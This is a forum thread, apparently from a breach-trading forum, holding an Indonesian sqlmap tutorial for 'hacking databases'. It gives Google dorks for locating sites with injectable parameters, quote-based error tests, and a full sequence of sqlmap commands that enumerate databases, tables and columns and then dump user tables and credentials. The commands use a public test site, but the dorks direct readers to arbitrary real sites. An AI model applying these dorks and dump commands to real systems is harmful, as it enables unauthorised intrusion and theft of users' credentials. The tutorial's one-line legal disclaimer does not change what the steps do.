[2022] SQL injection | Tutorial Hack Database |
by - Thursday, January 1, 1970 at 12:00 AM
Tnx for shearing
Reply
can't it be in english? I think it would be better to share useful information in english, Bro.
Reply
(September 27, 2022, 09:46 AM)KingJava Wrote: [hide] Hai Teman-teman, dalam tutorial ini kita akan mendemonstrasikan peretasan dasar data melalui salah satu alat paling berharga yang disebut "sqlmap". Tutorial ini dirancang hanya untuk tujuan pendidikan di mana Kami akan mengarahkan Anda ke langkah-langkah lengkap untuk mendapatkan web server karena kerentanan injeksi sql menggunakan alat sqlmap.

Hmm ! Tapi mengapa kita menggunakan alat sqlmap? ! Kerentanan injeksi SQL dapat dideteksi menggunakan beberapa muatan yang terkenal, tetapi mengeksploitasi kerentanan dapat menjadi rumit jika Anda pemula, itu sebabnya kami menggunakan alat seperti "sqlmap" yang mampu mengeksploitasi kerentanan injeksi SQL menggunakan beberapa kombinasi per detik. sqlmap adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi, mengeksploitasi kerentanan SQL dan mengambil alih database server.

Perlu diingat Penggunaan sqlmap untuk menyerang target tanpa persetujuan bersama sebelumnya adalah ilegal.

Mari lihat !!

Mengapa Kerentanan SQL Injection Terjadi?
Kerentanan injeksi SQL menjadi yang teratas di OWASP Top 10 dan bahkan kerentanan injeksi paling kritis. Cacat injeksi terjadi ketika aplikasi web menerima pasokan pengguna yang tidak tepercaya dan mengeksekusinya langsung di database sebagai perintah atau kueri. Demikian juga injeksi SQL adalah teknik injeksi kode, yang digunakan untuk menyerang aplikasi berbasis data, di mana pernyataan SQL berbahaya dimasukkan ke dalam bidang entri apa pun untuk tujuan eksekusi oleh penyerang. Jadi ada dua cara untuk mendeteksi dan mengeksploitasi kerentanan injeksi SQL.

Dideteksi secara manual dengan serangkaian tes yang sistematis.
Dengan menggunakan alat otomatisasi seperti : SQLmap.
Namun, kami akan melakukan hal yang sama dalam kedua cara, tetapi untuk metode manual Anda harus memiliki lebih banyak pengetahuan tentang pernyataan database MySQL dan jika Anda seorang pemula maka Anda harus menggunakan alat otomatis. Pada artikel ini kita akan menggunakan bantuan alat otomatis "SQLmap" untuk melakukan peretasan database MySQL atau pengujian penetrasi. Ayo mulai !!

Alat Sqlmap sudah diinstal sebelumnya di sistem operasi Kali Linux

-Google Dork
Google Dorks berguna untuk tujuan pengumpulan informasi pasif. Ini adalah cara terbaik untuk pengintaian tentang situs web target bahkan situs target tidak tahu tentang pengintaian kami. Kami tidak memiliki situs web yang rentan di mana kami dapat melakukan injeksi SQL maka kami akan mengambil bantuan dari google dork. Kami akan mencoba menemukan kerentanan dalam aplikasi web melalui parameter “cat”. Tetapi pertanyaannya adalah, mengapa kita memilih parameter itu sendiri untuk menguji atau mengeksploitasi kerentanan injeksi SQL? Oke !! Awalnya parameter juga dikenal dengan alias string kueri dan menurut Google itu adalah cara menyampaikan informasi ke server melalui URL, itu sebabnya penyerang membutuhkan bantuan parameter untuk memasukkan pernyataan SQL berbahaya mereka langsung ke dalam database.

inurl:index.php?id=

inurl:galery.php?id=

inurl:post.php?id=

inurl:artikel?id=

...di antara banyak lainnya.

untuk ini kami menggunakan dork ini


inurl:".php?cat=" inurl:"

Google memberikan banyak situs web di mana parameter "kucing" digunakan untuk menampilkan konten halaman web atau tujuan yang berbeda. Kami memilih situs web berikut dan segera setelah kami menambahkan kutipan tunggal setelah parameter “?cat=", kami mendapatkan kesalahan sintaks MySQL yang berarti situs tersebut rentan terhadap kerentanan injeksi SQL.

--- http://testphp.vulnweb.com/listproducts.php?cat=1' --

Dengan demikian, kita dapat mencoba mengidentifikasi kerentanan injeksi SQL dengan menggunakan karakter meta -2 yang terpisah. Sekarang ditemukan bahwa situs web tidak aman dan kami akan mendapatkan data dari database menggunakan alat sqlmap.

-- http://testphp.vulnweb.com/listproducts.php?cat=1"" --

Basis Data
Tujuan pertama kami adalah membuang seluruh database dari server web. Periksa perintah di bawah ini di mana parameter "U" telah digunakan untuk memberikan lokasi yang tepat dari kerentanan injeksi SQL yang ditemukan di situs web. Parameter "dbs" digunakan untuk membuang nama database.

Penggunaan !! sqlmap -u “<URL>>” –dbs

( sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs )


Besar !! Sqlmap telah berhasil mendeteksi kerentanan injeksi SQL yang mengakibatkan kami mendapatkan nama database yang tersedia di aplikasi web.


Kami ingin menghapus pertanyaan di benak Anda terkait dengan perintah batch. SQLMap mungkin meminta kami untuk memberikan masukan selama pemindaian, oleh karena itu kami menggunakan fitur ini untuk membuang semuanya setelah itu melakukan semua tugas ini sendiri.

Penggunaan !! sqlmap -u “<URL>>” –dbs –batch

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch

Seperti yang Anda lihat, dua database dibangun ke dalam server database aplikasi web.

Tabel
Seperti yang kita ketahui bahwa database SQL berisi beberapa objek seperti tabel. Jadi kami akan memilih salah satu dari dua database dan mencoba membuang nama tabel yang ada di database menggunakan perintah berikut. "-D" digunakan untuk nama database.

Penggunaan !! sqlmap -u “<URL>>” -D < nama database > –tabel

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Besar !! Kami mendapatkan apa yang kami pikirkan! Seperti yang Anda lihat setelah menjalankan di atas, kami mendapatkan nama tabel yang ada di database aplikasi web.

kolom
Dalam database relasional, kolom adalah kumpulan nilai data yang berisi nilai teks, angka, email, dan kata sandi. Sekarang Anda dapat memilih salah satu tabel yang ingin Anda buang tetapi dalam kasus kami, kami akan memilih tabel "pengguna" untuk mendapatkan informasi sensitif dari database.

Penggunaan !! sqlmap -u “<URL>>” -D < nama database > -T < nama tabel > –kolom

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T pengguna --columns

Baik !! Kami pergi ke jalan yang benar dan seperti yang Anda lihat, kami telah berhasil membuang semua kolom menggunakan perintah di atas. Sekarang kita memiliki semua file sensitif di depan kita, mari kita coba untuk membuangnya.

Kolom Buang
Penantian sudah berakhir sekarang dan pertama-tama kita akan membuang file alamat email dari database. Cukup tambahkan nama kolom ke perintah dan buang file.

Penggunaan !! sqlmap -u “<URL>>” -D < nama database > -T < nama tabel > -C < nama kolom > –dump

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T pengguna -C email --dump

YA!! Anda dapat melihat bahwa kami telah menemukan alamat email di file yang tidak cukup. Jadi mari kita coba untuk membuang seluruh tabel.
Buang Tabel Khusus
Seperti yang Anda lihat, membuang tabel satu per satu dan kemudian kolomnya akan menjadi proses yang sangat panjang, oleh karena itu kita akan membuang seluruh tabel sekaligus dengan menambahkan parameter “dump” setelah tabel.

Penggunaan !! sqlmap -u “<URL>>” -D < nama database > -T < nama tabel > –dump –batch

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T pengguna --dump --batch

Luar biasa!! Akhirnya kami mendapatkan pengguna kredensial yang sensitif setelah membuang seluruh tabel "pengguna" dan dengan demikian kami telah berhasil meretas data dasar aplikasi web dengan menggunakan alat sqlmap.
Bang Semua Meja
Alat ini memiliki fitur lain di mana kita dapat membuang jumlah beberapa tabel sekaligus. Mari kita coba juga. Tepat setelah memilih database apa pun, Anda perlu menambahkan fitur “--dump-all”.

Penggunaan!! sqlmap -u “<URL>>” -D < nama database > –dump-all –batch

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart ---dump-al
[/bersembunyi]Mendukung Dogecoin: DAz5SJNjedqL9qCDwJDCrzYjAHBm3DcCii


Gratis untuk semua Jangan untuk mendapatkan REPUTASI


Read this please before post: https://breached.to/Thread-Pesan-untuk-semua-pengguna-di-Indonesia-A-message-to-our-users-from-Indonesia
Reply


 Users viewing this thread: [2022] SQL injection | Tutorial Hack Database |: No users currently viewing.